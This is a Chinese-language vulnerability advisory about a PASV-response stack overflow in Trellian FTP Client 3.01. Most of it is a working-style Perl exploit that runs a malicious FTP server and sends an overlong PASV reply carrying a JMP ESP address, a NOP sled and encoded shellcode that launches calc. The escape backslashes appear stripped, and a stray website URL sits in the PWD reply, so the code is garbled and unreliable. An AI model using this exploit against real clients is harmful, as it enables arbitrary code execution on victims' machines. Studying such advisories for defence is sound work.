影响版本:
Trellian FTP Client 3.01漏洞描述:
Trellian FTP是一款常用的FTP客户端。

Trellian FTP客户端在处理FTP响应时存在栈溢出漏洞。用户受骗连接到了恶意的FTP服务器并接收到了超长的PASV响应就可以触发这个溢出,导致在用户机器上执行任意代码。

<*参考

*>
测试方法:

本站提供程序(方法)可能带有攻击性,仅供安全研究与教学之用,风险自负!

# Exploit Title: Trellian FTP Client PASV BOF exploit
# Date: 2010-04-11
# Author: zombiefx
# Software Link:
# Version: Trellian FTP Client v 3.01
# Tested on: Windows XP SP3
# Usage: ./ftpserver.pl
# Acts as a fake ftp server that passes the vulnerable PASV command when a clients connects.
# Code:
#!/usr/bin/perl
use warnings;
use strict;
use IO::Socket;
my $ftpsock =
  new IO::Socket::INET( LocalPort => 21, Proto => tcp, Listen => 1 )
  or die "Socket Not Created $! ";
print"############################################################# "
   . "#          Trellian FTP Client PASV BOF exploit             # "
   . "#          Author:zombiefx                                  # "
   . "#          Greetz to: corelanc0d3r/Dino Dai Zovi            # "
   . "#                # "
   . "#          :8800                       # "
   . "############################################################# ";
my $junk   = "x41" x 200;
my $jmpesp = pack( V,0x7E429353 ); #oops
my $nops   = "x90" x 50;
my $calcshell =
    "x89xe2xdaxc1xd9x72xf4x58x50x59x49x49x49x49"
  . "x43x43x43x43x43x43x51x5ax56x54x58x33x30x56"
  . "x58x34x41x50x30x41x33x48x48x30x41x30x30x41"
  . "x42x41x41x42x54x41x41x51x32x41x42x32x42x42"
  . "x30x42x42x58x50x38x41x43x4ax4ax49x4bx4cx4a"
  . "x48x50x44x43x30x43x30x45x50x4cx4bx47x35x47"
  . "x4cx4cx4bx43x4cx43x35x43x48x45x51x4ax4fx4c"
  . "x4bx50x4fx42x38x4cx4bx51x4fx47x50x43x31x4a"
  . "x4bx51x59x4cx4bx46x54x4cx4bx43x31x4ax4ex50"
  . "x31x49x50x4cx59x4ex4cx4cx44x49x50x43x44x43"
  . "x37x49x51x49x5ax44x4dx43x31x49x52x4ax4bx4a"
  . "x54x47x4bx51x44x46x44x43x34x42x55x4bx55x4c"
  . "x4bx51x4fx51x34x45x51x4ax4bx42x46x4cx4bx44"
  . "x4cx50x4bx4cx4bx51x4fx45x4cx45x51x4ax4bx4c"
  . "x4bx45x4cx4cx4bx45x51x4ax4bx4dx59x51x4cx47"
  . "x54x43x34x48x43x51x4fx46x51x4bx46x43x50x50"
  . "x56x45x34x4cx4bx47x36x50x30x4cx4bx51x50x44"
  . "x4cx4cx4bx44x30x45x4cx4ex4dx4cx4bx45x38x43"
  . "x38x4bx39x4ax58x4cx43x49x50x42x4ax50x50x42"
  . "x48x4cx30x4dx5ax43x34x51x4fx45x38x4ax38x4b"
  . "x4ex4dx5ax44x4ex46x37x4bx4fx4dx37x42x43x45"
  . "x31x42x4cx42x43x45x50x41x41";

while ( my $data = $ftpsock->accept() ) {
    print "Client Connected! Awaiting Ftp commands: ";
    print $data "220 Welcome ;)! ";
    while (<$data>) {
        print;
        print $data "331 Anonymous access allowed,send e-mail as password. " if (/USER/i);
        print $data "230-Welcome to the EVIL server 230 User logged in. " if (/PASS/i);
        print $data "257 "http://www.2cto.com/" is current directory. " if (/PWD/gis);
        print $data "227 Entering Passive Mode (".$junk.$jmpesp.$nops.$calcshell."). " if (/PASV/i);
        print $data "150 Here comes the directory listing. 226 Directory send OK. " if (/LIST/i);
    }
}

安全建议:
厂商补丁:

Trellian
--------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本: